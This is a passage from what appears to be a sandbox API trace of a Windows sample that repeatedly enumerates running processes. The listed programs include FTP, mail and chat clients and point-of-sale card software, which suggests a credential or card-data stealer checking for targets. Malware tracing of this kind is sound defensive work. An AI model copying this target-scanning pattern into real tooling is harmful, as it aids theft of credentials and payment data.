lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0276.786] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0276.788] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0276.789] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0276.791] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0276.792] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0276.796] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0276.798] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0276.799] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0276.801] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0276.803] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0276.804] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0276.806] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0276.917] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0276.919] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0276.921] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0276.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0276.925] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0276.927] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0276.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0276.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0276.936] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0276.937] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0276.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0276.941] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0276.943] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0276.944] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0276.946] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0276.948] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0276.953] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0276.954] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0276.958] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0276.960] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0276.961] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0276.963] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0276.967] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0276.969] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0276.971] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0276.973] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0276.974] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0276.976] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0276.978] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0276.982] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0276.984] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0276.985] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0276.987] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0276.988] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0276.990] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0276.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0276.993] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.048] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0277.093] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0277.095] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0277.097] CloseHandle (hObject=0x1d14) returned 1 [0277.097] Sleep (dwMilliseconds=0x64) [0277.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0277.210] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0277.216] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0277.218] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0277.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.222] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0277.224] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0277.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0277.226] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.228] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.229] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0277.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.235] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.245] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.247] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.248] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.251] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0277.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0277.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0277.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0277.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0277.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0277.266] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0277.269] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0277.271] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0277.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, 